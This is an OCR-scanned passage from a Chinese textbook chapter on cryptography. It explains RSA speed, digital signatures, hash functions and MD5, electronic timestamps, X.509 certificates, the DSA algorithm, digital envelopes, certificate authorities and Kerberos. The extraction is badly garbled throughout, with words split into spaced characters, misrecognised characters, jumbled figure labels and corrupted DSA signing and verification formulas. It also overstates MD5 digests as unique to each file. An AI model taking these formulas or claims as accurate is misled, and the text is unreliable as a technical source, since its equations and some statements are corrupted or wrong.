解 。 不 管 怎样 ,分 解 n 是 最 显而易见 的 攻击 方法 。 现 在 ,人 们 已 能 分 解 多 个 十 进 制 位 的 大 素 
数 。 因 此 , 模 数 必须 选 大 一 些 , 应 根据 具体 使 用 情况 而 定 。 


7.3.4 RSA 算法 的 速度 


由 于 进行 的 都 是 大 数 计算 ,使 得 RSA 最 快 的 情况 也 比 DES 慢 上 数 倍 , 无 论 是 用 软件 还 
是 硬件 实现 。 速 度 一 直 是 RSA 的 缺陷 。 一 般 来 说 只 用 于 少量 数据 加 密 。 

RSA 算法 是 第 一 个 能 同时 用 于 加 密 和 数字 签名 的 算法 ,也 具有 易于 理解 和 操作 的 优 
点 。RSA 是 被 研究 得 最 广泛 的 公 钥 算法 ,从 提出 到 现在 已 三 十 多 年 ,经 历 了 各 种 攻击 的 考 
验 , 逐 渐 为 人 们 接受 ,普遍 认为 是 目前 最 优秀 的 公 钥 方案 之 一 。 


7.4 数字 签名 与 数字 信封 


7.4.1 数字 签名 的 基本 概念 


在 计算 机 通信 中 , 当 接收 者 接收 到 一 个 消息 时 ,往往 需要 验证 消息 在 传输 过 程 中 有 没有 
被 算 改 ; 有 时 接收 者 需要 确认 消息 发 送 者 的 身份 。 所 有 这 些 都 可 以 通过 数字 签名 来 实现 。 
数字 签名 是 公开 密 钥 加 密 技术 的 一 种 应 用 。 

其 使 用 方式 是 : 报 文 的 发 送 方 从 报 文 文本 中 生成 一 个 128 位 的 散 列 值 ( 即 散 列 函数 值 ， 
根据 报 文 文本 而 产生 的 固定 长 度 的 单 向 散 列 值 。 有 时 这 个 单 向 值 也 叫做 报 文摘 要 ,与 报 文 
的 数字 指纹 或 标准 校 验 相似 ) 来 验证 发 送 报 文 的 完整 性 和 不 可 抵赖 性 。 

数字 签名 可 以 用 来 证 明 消 息 确实 是 由 发 送 者 签发 的 ,而 且 , 当 数字 签名 用 于 存储 的 数据 
或 程序 时 ,可 以 用 来 验证 数据 或 程序 的 完整 性 。 它 和 传统 的 手写 签名 类 似 ,应 满足 以 下 
条 件 。 

(1) 签名 是 可 以 被 确认 的 , 即 收 方 可 以 确认 或 证 实 签名 确实 是 由 发 方 签名 的 。 

(2) 签名 是 不 可 伪造 的 , 即 收 方 和 第 三 方 都 不 能 伪造 签名 。 
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(3) 签名 不 可 重用 , 即 签名 是 消息 (文件 ) 的 一 部 分 ,不 能 把 签名 移 到 其 他 消息 ( 文 
件 ) 上 。 

(4) 签名 是 不 可 抵赖 的 , 即 发 方 不 能 和 否认 他 所 签发 的 消息 。 

(5) 第 三 方 可 以 确认 收发 双方 之 间 的 消息 传送 但 不 能 算 改 消息 。 

1. 基于 密 钥 的 数字 签名 

使 用 对 称 密码 系统 可 以 对 文件 进行 签名 ,但 此 时 需要 可 信任 的 第 三 方 仲裁 。 设 BB 是 
A 和 了 共同 依赖 的 仲裁 人 。KA 和 Ks 分 别 是 A 和 B 与 BB 之 间 的 密 钥 ,而 Km 是 只 有 BB 
掌握 的 密 钥 ,已 是 A 发 给 B 的 消息 ,是 时 间 戳 。BB 解读 了 A 的 报 文 {A,Ka(B,Ra,t,P)} 
以 后 产生 了 一 个 签名 的 消息 Kaa(A,z,P) ,并 装配 成 发 给 B 的 报 文 {Ks(A,Ra,i,P,Kss(A， 
t,P)))}。B 可 以 解读 该 报 文 ,阅读 消息 了 ,并 保留 Kss(A,t,P)。 由 于 A 和 B 之 间 的 通信 和 是 
通过 中 间 人 BB 的 ,所 以 不 必 怀 疑 对 方 的 身份 。 又 由 于 证 据 Kass(A,t,P) 的 存在 ,A 不 能 否 
认 发 送 过 消息 P,B 也 不 能 改变 得 到 的 消息 已 ,因为 BB 仲裁 时 可 能 会 当场 解密 Kss(A,t,P)， 
得 到 发 送 人 ,发 送 时 间 和 原来 的 消息 已。 

2. 基于 公 钥 的 数字 签名 

利用 公 钥 加 密 算 法 的 数字 签名 系统 如 图 7-6 所 示 。 如 果 A 方 否 认 了 ,B 可 以 拿 出 DACP)， 
并 用 A 的 公 钥 Es 解密 得 到 已 ,从 而 证 明 已 是 A 发 送 的 。 如 果 也 把 消息 算 改 了 , 当 A 要 求 
B 出 示 原 来 的 DACP) 时 ,B 将 无 法 拿 出 。 


发 送 方 接收 方 
二 Eg | 2 下 A 
DA(P) Da(DA(P) Da(P) 


图 7-6 基于 公 钥 的 数字 签名 


在 实际 应 用 中 ,由 于 公开 密 钥 算 法 的 效率 较 低 ,发 送 方 并 不 对 整个 文件 签名 ,而 只 对 文 
件 的 散 列 值 签名 。 


7.4.2 数字 签名 技术 


1. 安全 Hash 函数 

Hash 函数 又 称 散 列 函数 。 主 要 功能 是 把 任意 长 度 的 输入 通过 散 列 算法 ,变换 成 固定 
长 度 的 输出 ,该 输出 就 是 散 列 值 。 或 者 说 就 是 一 种 任意 长 度 的 消息 压缩 到 某 一 固定 长 度 的 
消息 摘要 的 函数 。 

单 向 Hash 函数 用 于 产生 信息 摘要 。 信 息 摘要 是 计算 密码 检查 和 , 即 固定 长 度 的 认证 
码 , 附 加 在 消息 后 面 发 送 ,根据 认证 码 来 检查 报 文 是 否 被 算 改 。 它 简要 地 描述 了 一 份 较 长 的 
信息 , 它 可 以 看 做 是 一 份 长 文件 的 “数字 指纹 ”。 信 息 摘 要 用 于 创建 数字 签名 ,对 于 特定 的 文 
件 而 言 ,信息 摘要 是 唯一 的 。 信 息 摘要 可 以 被 公开 , 它 不 会 透露 相应 文件 的 任何 内 容 。 
MD4 和 MD5 是 由 Ron River 设计 的 专门 用 于 加 密 处 理 的 ,并 被 广泛 使 用 的 Hash 函数 。 

MD5 以 512 位 分 组 作为 输入 的 信息 , 且 每 一 分 组 又 被 划分 为 16 个 32 位 子 分 组 ,经 过 
了 一 系列 的 处 理 后 ,算法 的 输出 结果 由 4 个 32 位 分 组 组 成 ,将 这 4 个 32 位 子 分 组 级 联 后 将 
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生成 一 个 128 位 散 列 值 ( 即 128 位 的 信息 摘要 )。MD5 可 以 对 任何 文件 生成 一 个 唯一 的 
MD5 验证 码 ,每 个 文件 的 MD5 码 就 如 同 每 个 人 的 指纹 一 样 ,都 是 不 同 的 。 这 样 ,一 旦 这 个 
文件 在 传输 过 程 中 ,其 内 容 被 损坏 或 者 被 修改 ,那么 这 个 文件 的 MD5 码 就 会 发 生变 化 , 通 
过 对 文件 MD5 的 验证 ,可 以 得 知 获得 的 文件 是 否 完整 。 

通过 单 向 Hash 函数 生成 数字 摘要 ,并 用 单 向 检验 和 函数 CK 对 其 作用 ,计算 出 CK(MD， 
发 送 者 把 这 一 CK(M) 和 原 消息 一 起 发 送 到 目的 方 。 其 实现 过 程 总 结 如 下 。 

(1) 被 发 送 明 文 先 用 MD5 方式 产生 128 位 的 数字 摘要 。 

(2) 发 方 用 自己 的 私有 密 钥 对 摘要 加 密 , 形 成 “数字 签名 ”。 

(3) 将 原文 M 和 加 密 的 摘要 同时 传 给 对 方 。 

(4) 收 方 用 发 方 的 公 钥 对 摘要 进行 解密 ,同时 对 收 到 的 文件 用 MD5 编码 加 密 产 生 
摘要 。 

(5) 收 方 将 解码 后 的 摘要 和 收 到 的 原 明文 重新 用 MD5 加 密 产生 的 摘要 进行 对 比 , 如 果 
两 者 一 致 , 则 明文 信息 在 传递 过 程 中 没有 被 破坏 或 自 改 。 

采用 公 钥 密码 体制 和 单 向 Hash 函数 进行 的 数字 签名 过 程 如 图 7-7 所 示 。 

用 户 A 发 送 经 过 数字 签名 的 信息 给 用 户 B, 首 先 将 发 送 的 信息 M 经 过 Hash 运算 产生 
信息 M 的 信息 摘要 瓦 A ,将 该 信息 摘要 经 过 A 的 私 钥 Kx 加密 后 产生 A 的 签名 SA; 将 A 
要 发 送 的 信息 用 A 随机 产生 的 密 钥 Ks 进行 加 密 ,产生 密 文 Cs; 将 A 随机 产生 的 密 钥 K。 
用 B 的 公 钥 Ki 进行 加 密 , 得 到 加 密 的 密 钥 Ck、; 然后 ,用 户 A 将 签名 SA 、 密 文 Cs 和 加 密 
后 的 密 钥 Ck, 发 送 给 B。 用 户 B 收 到 这 些 信息 后 , 先 用 B 的 私 钥 K 妇 将 发 送 过 来 的 加 密 密 
钥 Crk 解密 后 得 到 密 钥 KA; 然后 用 该 密 钥 解密 密 文 C 得 到 信息 明文 M; 对 明文 信息 M 计 
算 其 信息 摘要 得 到 摘要 信息 Hs; 将 接收 到 的 签名 信息 Sa 用 用 户 A 的 公 钥 Ka 解密 得 到 
由 用 户 A 计算 出 的 信息 摘要 ,假定 记 为 Hh。 用 户 B 对 两 个 信息 摘要 态 。 和 Hh 进行 比较 ， 
若 相 同 , 则 证 明 信 息 发 送 过 程 中 未 发 生 任何 改变 ; 若 不 同 , 则 有 人 进行 了 修改 。 在 这 种 签名 
机 制 中 ,用 户 B 完全 可 以 相信 所 得 到 的 信息 一 定 是 用 户 A 发 送 过 来 的 ,同时 用 户 A 也 无 法 
否认 发 送 过 信息 ,因此 是 一 种 安全 的 签名 技术 方案 。 


A 


| 信息 摘要 签名 
M | | sh 
关机 产生 的 加 密 铀 ) 
Ca KB 公 CAA 
天 A 公 解密 : 
Kg A 公 解 密 
K 万 
解密 - 和 不 同 
1 被 修改 
入 Hash [到 |“ 比较 
相同 
未 被 修改 B 


图 7-7 采用 公 钥 密码 体制 和 单 向 Hash 函数 进行 的 数字 签名 过 程 
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2. 直接 方式 的 数字 签名 技术 

直接 方式 的 数字 签名 只 有 通信 双方 参与 ,并 假定 接收 一 方 知道 发 送 方 的 公开 密 钥 。 数 
字 签 名 的 形成 方式 可 以 用 发 送 方 的 密 钥 加 密 整个 消息 。 

如 果 发 送 方 用 接收 方 的 公开 密 钥 ( 公 钥 加 密 体制 ) 或 收发 双方 共享 的 会 话 密 钥 ( 密 钥 加 
密 体 制 ) 对 整个 消息 及 其 签名 进一步 加 密 ,那么 对 消息 及 其 签名 提供 了 更 高 保密 性 。 而 此 时 
的 外 部 保密 方式 ( 即 数字 签名 是 直接 对 需要 签名 的 消息 生成 而 不 是 对 已 加 密 的 消息 生成 , 否 
则 称 为 内 部 保密 方式 ) , 则 对 解决 争议 十 分 重要 ,因为 在 第 三 方 处 理 争议 时 ,需要 得 到 明文 消 
息 及 其 签名 才 行 。 但 如 果 采 用 内 部 保密 方式 ,那么 ,第 三 方 必 须 在 得 到 消息 的 解密 密 钥 后 才 
能 得 到 明文 消息 。 如 果 采 用 外 部 保密 方式 ,那么 ,接收 方 就 可 将 明文 消息 及 其 数字 签名 存储 
下 来 以 备 之 后 可 能 出 现 争议 时 使 用 。 

直接 方式 的 数字 签名 有 一 弱点 , 即 方案 的 有 效 性 取决 于 发 方 密 钥 的 安全 性 。 如 果 发 方 
想 对 自己 已 发 出 的 消息 予以 否认 ,就 可 声称 自己 的 密 钥 已 丢失 被 盗 , 认 为 自己 的 签名 是 他 人 
伪造 的 。 对 这 一 弱点 可 采取 某 些 行政 手段 ,在 某 种 程度 上 可 减弱 这 种 威胁 ,如 要 求 每 一 个 被 
签 的 消息 都 包含 一 个 时 间 戳 (日 期 和 时 间 ) ,并 要 求 密 钥 丢失 后 立即 向 管理 机 构 报告 。 这 种 
方式 的 数字 签名 还 存在 发 方 的 密 钥 真 地 被 偷 的 危险 ,例如 , 敌 方 在 时 刻 T 获得 发 方 的 密 钥 ， 
然后 可 伪造 一 消息 ,用 偷 得 的 密 钥 为 其 签名 并 加 上 工 以 前 的 时 刻 作 为 时 间 戳 。 

3. 电子 邮 疏 

在 交易 文件 中 ,时 间 是 十 分 重要 的 因素 ,需要 对 电子 交易 文件 的 日 期 和 时 间 采 取 安 全 措 
施 , 以 防 文件 被 伪造 或 和 代 改 。 电 子 邮戳 服务 是 计算 机 网 络 上 的 安全 服务 项 目 ,由 专门 机 构 提 
供 。 电 子 邮 截 是 时 间 戳 ,是 一 个 经 加 密 后 形成 的 凭证 文档 , 它 包 括 以 下 三 部 分 。 

(1) 需要 加 邮戳 的 是 文件 的 信息 摘要 (digest) 。 

(2) ETS(Electronic Time-stamp Server, 电 子 时 间 戳 服务 器 ) 收 到 文件 的 日 期 和 时 间 。 

(3) ETS 的 数字 签名 。 

时 间 截 产生 的 过 程 为 : 用 户 首先 将 需要 加 时 间 戳 的 文件 用 Hash 编码 加 密 形 成 摘要 ， 
然后 将 该 摘要 发 送 到 DTS( Digital Time-stamp Service, 数字 时 间 截 服务 ) 机 构 ,DTS 在 加 
入 了 收 到 文件 摘要 的 日 期 和 时 间 信 息 后 再 对 该 文件 加 密 ( 数 字 签名 ) ,最 后 送 回 用 户 。 由 
Bell core 创造 的 DTS 采用 下 面 的 过 程 : 加 密 时 将 摘要 信息 归并 到 二 又 树 的 数据 结构 ,再 将 
二 叉 树 的 根 值 发 表 在 报纸 上 ,这 样 便 有 效 地 为 文件 发 表 时 间 提 供 了 佐证 。 注 意 ,书面 签署 文 
件 的 时 间 是 由 签署 人 自己 写 上 的 ,而 数字 时 间 惟 则 不 然 , 它 是 认证 单位 DTS 加 上 的 ,以 DTS 
收 到 文件 的 时 间 为 依据 。 因 此 ,时 间 戳 也 可 以 作为 科学 家 的 科学 发 明文 献 的 时 间 认 证 。 

4. 数字 证 书 

数字 签名 很 重要 的 机 制 是 数字 证 书 (Digital Certificate, 或 Digital ID)。 数 字 证 书 又 称 
为 数字 和 凭证 ,是 用 电子 手段 来 证 实 一 个 用 户 的 身份 和 对 网 络 资源 访问 的 权限 。 在 网 上 的 电 
子 交易 中 ,如 双方 出 示 了 各 自 的 数字 凭证 ,并 用 它 来 进行 交易 操作 ,那么 双方 都 可 不 必 为 对 
方 身份 的 真 伪 担 心 。 数 字 和 凭证 可 用 于 电子 邮件 .电子 商务 、 群 件 和 电子 基金 转移 等 各 种 用 
途 。 数 字 证 书 是 一 个 经 证 书 授权 中 心 数字 签名 的 包含 公开 密 钥 拥 有 者 信息 以 及 公开 密 钥 的 
文件 。 证 书 授权 中 心 一 般 是 一 个 权威 机 构 一 一 CA 证 书 授权 (Certificate Authority) 中 心 ， 
人 们 可 以 在 互联 网 交往 中 用 它 来 识别 对 方 的 身份 。 在 数字 证 书 认证 的 过 程 中 ,证 书 认证 中 
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心 (CA) 作 为 权威 的 .公正 的 .可 信赖 的 第 三 方 .其 作用 是 至 关 重 要 的 。 数 字 证 书 由 独立 的 证 
书 发 行 机 构 发 布 。 数 字 证 书 各 不 相同 ,每 种 证 书 可 提供 不 同 级 别 的 可 信和 度 。 

公开 密 钥 技 术 解决 了 密 钥 发 布 的 管理 问题 。 最 简单 的 数字 证 书包 含 一 个 公开 密 钥 、 名 
称 以 及 证 书 授权 中 心 的 数字 签名 。 一 般 情 况 下 ,数字 证 书 还 包括 密 钥 的 有 效 时 间 ` 发 证 机 关 
的 名 称 和 证 书 的 序列 号 等 信息 ,证 书 的 格式 遵循 ITU-T X. 509 国际 标准 。 

(1) 版 本 号 : 用 于 区 分 X. 509 的 不 同 版 本 。 

(2) 序列 号 : 由 同一 发 行者 (CA) 发 放 的 每 个 证 书 的 序列 号 是 唯一 的 。 

(3) 签名 算法 : 签署 证 书 所 用 的 算法 及 其 参数 。 

(4) 发 行者 : 指 建 立 和 签署 证 书 的 CA 的 X. 509 名 字 。 

(5) 有 效 期 : 包括 证 书 有 效 期 的 起 始 时 间 和 终止 时 间 。 

(6) 主体 名 : 指证 书 持 有 者 的 名 称 及 有 关 信 息 。 

(7) 公 钥 : 有 效 的 公 钥 以 及 其 使 用 方法 。 

(8) 发 行者 ID: 任 选 的 ,名 字 唯 一 标识 证 书 的 发 行者 。 

(9) 主体 ID: 任 选 的 ,名 字 唯 一 标识 证 书 的 持 有 者 。 

(10) 扩展 域 : 添加 的 扩充 信息 。 

(11) 认证 机 构 的 签名 : 用 CA 私 钥 对 证 书 的 签名 。 

数字 证 书 有 着 广泛 的 现实 作用 , 它 可 以 分 为 以 下 三 种 类 型 。 

(1) 个 人 凭证 (Personal Digital ID) , 它 仅 为 某 一 个 用 户 提 供 凭 证 ,以 帮助 个 人 进行 安全 
交易 操作 。 个 人 身份 的 数字 凭证 通常 是 安装 在 客户 端的 浏览 器 中 的 ,并 通过 安全 的 电子 邮 
件 来 进行 交易 操作 。 

(2) 企业 凭证 (Server ID) , 它 通常 为 网 上 某 个 Web 服务 器 提供 凭证 ,拥有 Web 服务 器 
的 企业 就 可 以 用 具有 凭证 的 Web 站 点 来 进行 安全 电子 交易 。 有 凭证 的 Web 服务 器 会 自动 
地 将 其 与 客户 端 Web 浏览 器 通信 的 信息 加 密 。 

(3) 软件 (开发 者 ) 凭 证 (Developer ID), 它 通常 为 因特网 中 被 下 载 的 软件 提供 凭证 ,该 
凭证 用 于 微软 公司 的 Authenticode 技术 中 ,以 使 用 户 在 下 载 软件 时 能 获得 所 需 的 信息 。 


7.4.3 数字 签名 算法 


1991 年 8 月 ,美国 NIST 公布 了 用 于 数字 签名 标准 DSS 的 数字 签名 算法 DSA,1994 年 
12 月 1 日 正式 成 为 美国 联邦 信息 处 理 标准 。 

DSA 中 用 到 了 以 下 参数 。 

(1) pp 为 L 位 长 的 素数 ,其 中 ,为 512 一 1024 之 间 的 数 , 且 是 64 的 倍数 。 

(2) g 是 160 位 长 的 素数 ,上 且 为 p 一 1 的 因子 。 

(3) g 一 AD mod p, 其 中 ,h 是 满足 1 二 h 二 p 一 1 且 h% ?4 mod p 大 于 1 的 整数 。 

(4) 工 是 随机 产生 的 大 于 0 而 小 于 g 的 整数 。 

(5) y=g*mod p。 

(6) & 是 随机 产生 的 大 于 0 而 小 于 d 的 整数 。 

前 三 个 参数 p,qg,g 是 公开 的 ; z 为 私 钥 ,y 为 公 钥 ; x 和 k 用 于 数字 签名 ,必须 保密 ; 对 
于 每 一 次 签名 都 应 该 产生 一 次 &。 

对 消息 m 签名 : 
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r=(gk mod pmodg 
s=(k (SHA—1(m)+zr) modg 
r 和 s 就 是 签名 。 验 证 签名 时 ,计算 : 
w=s !'mod g 
ul=(SHA—1(n)Xw)modg 
u2= (rw)modg 
v=((g" Xy*)mod pmodg 
如 果 v==r, 则 签名 有 效 。 


7.4.4 数字 信封 技术 


数字 信封 是 公 钥 密码 体制 (PKD 在 实际 中 的 一 个 应 用 ,是 用 加 密 技术 来 保证 只 有 规定 
的 特定 收 信人 才能 阅读 通信 的 内 容 。 数 字 信封 技术 使 用 两 层 加 密 体制 ,内 层 使 用 对 称 加 密 
技术 ,外 层 使 用 非 对 称 加 密 技术 。 具 体 过 程 为 : 信息 发 送 方 采用 对 称 密 钥 来 加 密 信息 内 
容 , 然 后 将 此 对 称 密 钥 用 接收 方 的 公开 密 钥 来 加 密 ( 这 部 分 称 为 数字 信封 ) 之 后 ,将 它 和 
加 密 后 的 信息 发 送 给 接收 方 ,接收 方 先 用 相应 的 私有 密 钥 打 开 数 字 信 封 ,得 到 对 称 密 钥 ， 
然后 使 用 对 称 密 钥 解 开 加 密 信息 。 这 种 技术 的 安全 性 相当 高 。 数 字 信封 主要 包括 数字 
信封 打包 和 数字 信封 拆 解 ,数字 信封 打包 是 使 用 对 方 的 公 钥 将 加 密 密 钥 进行 加 密 的 过 
程 ,只 有 对 方 的 私 钥 才 能 将 加 密 后 的 数据 还 原 。 数 字 信 封 拆 解 是 使 用 私 钥 将 加 密 过 的 数 
据 解密 的 过 程 。 

图 7-8 是 采用 数字 信封 技术 加 密 信息 的 过 程 示意 图 。 


A 随机 产生 


M 


图 7-8 采用 数字 信封 技术 加 密 信 息 的 过 程 示 意图 


用 户 A 要 发 送信 息 M 给 用 户 B, 要 求 只 能 由 用 户 B 阅读, 则 采用 这 种 技术 方案 。 在 信 
息 发 送 的 过 程 中 ,用 户 A 将 明文 信息 M 通 过 自己 随机 产生 的 对 称 密 钥 K^ 进行 加 密 , 得 到 
密 文 C; 将 密 钥 用 用 户 B 的 公 钥 Ksa 进行 加 密 得 到 加 密 的 密 钥 Ck, 。 将 密 文 C 和 加 密 后 的 
密 钥 Cx 同时 发 送 到 用 户 B。 用 户 也 接收 到 以 后 ,首先 用 B 的 私 钥 Ksg 对 加 密 密 钥 Cx 进 
行 解密 得 到 密 钥 Ks, 然 后 用 该 密 钥 对 密 文 进行 解密 得 到 明文 信息 M。 由 于 其 他 人 没有 也 
的 私 铀 ,因此 该 信息 只 能 由 用 户 B 阅读 ,保证 了 信息 的 私密 性 。 
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7.5 认证 技术 
7.5.1 认证 技术 的 基本 概念 


认证 又 分 为 实体 认证 和 消息 认证 两 种 。 实 体 认 证 是 识别 通信 对 方 的 身份 ,以 防止 假冒 ， 
可 以 使 用 数字 签名 的 方法 。 消 息 认证 是 验证 消息 在 传送 或 存储 过 程 中 没有 被 算 改 ,通常 使 
用 消息 摘要 的 方法 。 在 进行 实体 认证 时 则 需要 建立 一 些 规范 的 机 制 来 对 数据 来 源 的 可 靠 
性 真实 性 加 以 认证 。 例 如 : 网 络 上 的 两 个 用 户 A 和 B, 他 们 想 通过 网 络 先 建立 安全 的 共享 
密 钥 再 进行 保密 通信 ,那么 A 如 何 确信 与 自己 正在 通信 的 是 B 呢 ? 这 种 通信 方式 是 双向 通 
信 , 因 此 此 时 的 认证 称 为 互相 认证 。 类 似 地 ,对 于 单 向 通信 来 说 ,认证 称 为 单 向 认证 。 

认证 中 心 (Certificate Authority,CA) 在 网 络 通信 认证 中 具有 特殊 的 地 位 。 例 如 ,在 进 
行 电子 商务 时 ,认证 中 心 是 为 了 从 根本 上 保障 电子 商务 顺利 进行 而 设立 的 ,主要 是 解决 电子 
商务 活动 中 参与 各 方 的 身份 .资质 的 认定 ,维护 交易 活动 的 安全 。CA 是 提供 身份 验证 的 第 
三 方 机 构 ,通常 由 一 个 或 多 个 用 户 信任 的 组 织 实体 组 成 。 例 如 , 持 卡 人 要 与 商家 通信 , 持 卡 
人 从 公开 媒体 上 获得 了 公开 密 钥 , 但 无 法 确定 不 是 冒充 的 ,于 是 请 求 CA 对 商家 认证 。 此 
时 ,CA 对 商家 进行 验证 ,其 过 程 为 持 卡 人 一 商家 、 持 卡 人 一 CA、CA 一 持 卡 人 。 证 书 一 般 包 
含 拥有 的 标识 名 称 和 公 钥 ,并 且 由 CA 进行 数字 签名 。 

CA 的 功能 主要 有 : 接收 注册 申请 、 处 理 、 批 准 /拒绝 请 求 和 颁发 证 书 。 

在 实际 动作 中 ,CA 也 可 由 大 家 都 信任 的 一 方 担 当 , 例 如 ,在 客户 、 商 家 \ 银 行 三 角 关 系 
中 ,客户 使 用 的 是 由 某 个 银行 发 的 卡 , 而 商家 又 与 此 银行 有 业务 关系 (有 账号 )。 在 此 情况 
下 ,客户 和 商家 都 信任 该 银行 ,可 由 该 银行 担当 CA 角色 ,接收 和 处 理 客户 证 书 的 验证 请 求 。 
又 如 ,对 商家 自己 发 行 的 购物 卡 , 则 可 由 商家 自己 担当 CA 角色 。 


7.5.2 信息 的 认证 


在 进行 信息 认证 时 ,采用 速度 比较 快 的 密码 机 制 , 即 上 面 提 到 的 散 列 函数 ,并 对 计算 得 
到 的 信息 摘要 用 发 送 方 的 私 钥 加 密 ,将 此 加 密 信 息 和 原 消息 一 起 发 送 至 目的 端 ,目的 端 通过 
执行 相应 操作 ,就 可 达到 信息 的 认证 。 


7.5.3 用户 认 证 和 证 明 权 威 


如 何 知道 在 每 次 通信 或 交易 中 所 使 用 的 密 钥 对 实际 上 就 是 用 户 的 密 钥 对 呢 ? 这 就 需 
一 种 认证 公用 密 钥 和 用 户 之 间 的 关系 的 方法 。 

解决 这 一 问题 的 方法 是 引入 一 种 叫做 证 书 或 凭证 的 特种 签名 信息 , 即 上 面 介绍 过 的 数 
字 证 书 。 下 面 只 针对 数字 证 书 如 何 工作 进行 说 明 。 其 工作 过 程 如 下 。 

用 户 首先 产生 自己 的 密 钥 对 ,并 将 公共 密 钥 及 部 分 个 人 身份 信息 传送 给 认证 中 心 。 认 
证 中 心 在 核实 身份 后 ,将 执行 一 些 必 要 的 步骤 ,以 确信 请 求 确实 由 用 户 发 送 而 来 ,然后 ,认证 
中 心 将 发 给 用 户 一 个 数字 证 书 , 该 证 书 内 包含 用 户 的 个 人 信息 和 他 的 公 钥 信息 ,同时 还 附 有 
认证 中 心 的 签名 信息 。 用 户 就 可 以 使 用 自己 的 数字 证 书 进 行 相关 的 各 种 活动 。 

网 络 的 每 个 用 户 必须 知道 CA 公用 密 钥 ,这 就 使 任何 一 个 想 验证 证 书 的 人 能 采用 用 于 
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验证 上 述 信息 和 数字 证 书 的 相同 程序 。CA 的 公用 密 钥 以 证 书 格式 提供 ,因而 它 也 是 可 以 
验证 的 。 证 明 权威 , 即 CA, 它 签发 并 管理 正式 使 用 公用 密 钥 与 用 户 相 关联 的 证 书 。 证 书 只 
在 某 一 时 间 内 有 效 , 因 而 CA 保存 一 份 有 效 证 书 及 其 有 效 期 清单 。 有 时 ,证 书 或 许 要 求 及 早 
废除 ,因而 CA 保存 一 份 废除 的 证 书 及 有 效 证 书 的 清单 。CA 把 其 有 效 证 书 、 废 除 证 书 或 过 
期 证 书 的 清单 提供 给 任何 一 个 要 获得 这 种 清单 的 人 。 


7.5.4 CA 结构 


证 书 管理 有 两 种 常用 的 结构 : CA 的 分 级 系统 和 信任 网 。 

在 分 级 证 明 中 ,顶部 即 根 CA, 它 验证 它 下 面 的 CA, 第 二 级 CA 再 验证 用 户 和 它 下 属 的 
CA, 以 此 类 推 。 

在 信任 网 络 中 ,用 户 的 公用 密 钥 能 以 任何 一 个 为 接收 证 书 的 人 所 熟悉 的 用 户 签名 的 证 
书 形式 提交 。 一 个 企图 获取 另 一 个 公用 密 钥 的 用 户 可 以 从 不 同 来 源 获取 ,并 验证 它们 是 否 
全 部 符合 。 


7.5.5 Kerberos 系统 


Kerberos 是 由 麻 省 理工 学 院 开 发 的 网 络 访问 控制 系统 , 它 是 一 种 完全 依赖 于 密 钥 加 密 
的 系统 范例 。 其 主要 的 功能 是 用 于 解决 保密 密 钥 管理 与 分 发 的 问题 。 

每 当 某 一 用 户 一 次 又 一 次 地 使 用 同样 的 密 钥 与 另 一 个 用 户 交 换 信息 时 ,将 会 产生 下 列 
两 种 不 安全 的 因素 。 

(1) 如 果 某 人 偶然 地 接触 到 了 该 用 户 所 使 用 的 密 钥 ,那么 ,该 用 户 曾经 与 另 一 个 用 户 交 
换 的 每 一 条 信息 都 将 失去 保密 的 意义 ,没有 什么 保密 可 言 了 。 

(2) 某 一 用 户 所 使 用 的 一 个 特定 密 钥 加 密 的 量 越 多 , 则 相应 地 提供 偷窃 者 的 内 容 也 越 
多 ,这 就 增加 了 偷窃 者 成 功 的 机 会 。 

因此 ,人 们 一 般 要 么 仅 将 一 个 对 话 密 钥 用 于 一 条 信息 或 与 男 一 方 的 一 次 对 话 中 ,要 么 建 
立 一 种 按时 更 换 密 钥 的 机 制 ,尽量 减少 密 钥 被 暴露 的 可 能 性 。 

另外 ,如 果 一 个 网 络 系统 有 1000 个 用 户 , 他 们 之 间 的 任何 两 个 用 户 需要 建立 安全 的 通 
信和 联系 , 则 每 一 个 用 户 需 要 999 个 密 钥 与 系统 中 的 其 他 人 保持 联系 ,可 以 想象 管理 如 此 多 的 
密 钥 ,其 系统 管理 的 难度 有 多 大 。 这 还 仅仅 只 是 让 每 一 对 人 使 用 单独 的 密 钥 ,还 未 考虑 允许 
不 同 的 对 话 密 钥 。 

上 述 问 题 就 是 共享 密 钥 管理 和 分 发 的 问题 ,这 正 是 Kerberos 需要 解决 的 问题 。 

Kerberos 建立 在 一 个 安全 的 、 可 信任 的 密 钥 分 发 中 心 (Key Distribute Center, KDC) 的 
概念 上 。 与 每 一 个 用 户 都 必须 知道 几 百 个 密码 的 情况 不 同 ,使 用 KDC 时 用 户 只 需 知 道 一 
个 密 钥 一 一 用 于 与 KDC 通信 的 密 钥 。Kerberos 的 工作 过 程 可 以 形象 地 描述 如 下 。 

假设 用 户 A 想 要 与 用 户 B 秘密 通信 。 首 先 ,由 A 呼叫 KDC, 请 求 与 B 联系 。 然 后 ， 
KDC 为 A 与 B 之 间 的 对 话 选择 一 条 随机 的 对 话 密 钥 , 设 为 X, 并 生成 一 个 “标签 ”, 由 KDC 
将 拥有 这 个 “标签 "的 人 A 告诉 B, 并 请 B 使 用 对 话 密 钥 X 与 A 交谈。 与 此 同时 ,KDC 发 给 
A 的 消息 则 用 只 有 A 与 KDC 知道 的 A 的 共享 密 钥 加 密 , 告 诉 A 可 以 用 对 话 密 钥 X 与 B 
交谈 。 此 时 ,A 对 KDC 的 回答 进行 解密 ,恢复 对 话 密 钥 X 和 给 B 的 标签 。 在 这 个 过 程 中 ， 
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和 A 无 法 修改 标签 的 头 部 与 细节 ,因为 该 标签 用 只 有 B 和 KDC 知道 的 共享 密 钥 加 密 。 

然后 ,A 呼叫 B, 告 诉 对 方 标签 是 由 KDC 给 的 。 接 着 ,B 对 标签 的 内 容 进 行 解密 ,知道 
只 有 KDC 和 他 自己 能 用 且 用 知道 的 口令 对 该 消息 进行 加 密 , 并 恢复 A 的 名 字 及 对 话 密 
钥 X。 

至 此 ,A 和 B 就 可 以 用 对 话 密 钥 X 相互 安全 地 进行 通信 了 。 

其 实在 实际 工作 过 程 中 ,每 一 步 的 实现 都 由 相关 机 构 代 为 实现 ,下 面 了 解 一 下 
Kerberos 的 安全 机 制 和 它 的 基本 工作 机 制 。 

Kerberos 的 安全 机 制 : D AS(CAuthentication Server, 认证 服务 器 ) ,是 为 用 户 发 放 
TGT 的 服务 器 ; @DTGS(CTicket Granting Server, 票 证 授予 服务 器 ) ,负责 发 放 访问 应 用 服 
务 器 时 需要 的 票证 ; 认证 服务 器 和 票据 授予 服务 器 组 成 密 钥 分 发 中 心 KDC; @V, 用 户 请 
